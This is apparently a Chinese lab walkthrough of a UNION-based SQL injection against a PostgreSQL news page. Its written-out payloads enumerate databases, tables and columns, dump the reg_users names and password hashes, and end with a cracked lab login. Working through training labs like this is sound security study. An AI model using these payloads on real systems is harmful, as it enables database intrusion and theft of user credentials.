步骤一:测试是否存在注入点
new_list.php?id=1 and 1=2
步骤二:order by 查看数据库字段列数
new_list.php?id=1 order by 4
new_list.php?id=1 order by 5
order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个
步骤三:查看回显点
new_list.php?id=1 and 1=2 union select null,'null','null',null
步骤四:查看数据库
new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,'~'),null from pg_database
步骤五:查看数据库下的表名
new_list.php?id=1 and 1=2 union select null,null,string_agg(table_name,','),null from information_schema.tables where table_schema='public'
步骤六:查看reg_users表中的字段名
new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
步骤七:查看用户名和密码
new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
步骤八:MD5解密密码并登录
name:mozhe1
password:785576